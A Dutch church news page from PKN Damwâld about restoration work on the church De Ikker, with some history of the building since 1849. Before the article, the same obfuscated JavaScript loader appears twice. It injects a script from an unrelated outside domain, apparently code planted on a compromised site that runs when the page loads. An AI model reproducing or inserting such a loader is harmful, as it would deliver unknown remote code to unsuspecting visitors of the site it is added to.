;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); De Ikker uit de steigers - PKN Damwâld

De Ikker uit de steigers

Gepubliceerd op: maandag 24 juli 2017

Nu de steigers rondom de toren zijn verdwenen, staat De Ikker in al haar pracht weer mooi te zijn. In de afgelopen weken is er door medewerkers onder anderen schildersbedrijf De Zwart en timmerbedrijf A. T. De Hoop uit Damwâld onder auspiciën van de kerkrentmeesters hard gewerkt aan het hout-, voeg- en schilderwerk. En … het resultaat (zie bijgaande foto’s ) mag er dan ook zijn !
De kerk kent een rijke geschiedenis. De Ikker aan de Hearewei in Damwâld is gebouwd in 1849 op het terrein van de toen pas afgebroken oude kerk. De laatste dienst in die oude kerk werd gehouden op 30 april 1849. Deze oude kerk had onder andere twee torens, een zadeldak- en een spitse toren. Vermoedelijk was deze kerk gebouwd in de 13e eeuw. De laatste dienst in die oude kerk werd gehouden op 30 april 1849 met als voorganger de toenmalige predikant ds. P. van Kleffens. De huidige kerk werd in 1849 gebouwd door timmerman Klaas Fokkes Osinga uit Dokkum. De eerste steen werd gelegd door de 11-jarige Lambert Willem van Kleffens, de enige zoon van Ds. Van Kleffens. Deze steen is aangebracht boven de ingang in de Westelijke muur. De inwijding, onder leiding van ds. Van Kleffens, vond plaats op 2 december 1849.

De torenspits van De Ikker schittert weer in volle glorie. Kerken zoals De Ikker  en uiteraard ook onze Bonifatiuskerk vormen natuurlijk een groot deel van onze geschiedenis. Het grote onderhoud en de restauratiewerkzaamheden heeft er in ieder geval aan bijgedragen dat we voorlopig met veel plezier weer jaren veilig en vertrouwd kunnen kerken in De Ikker.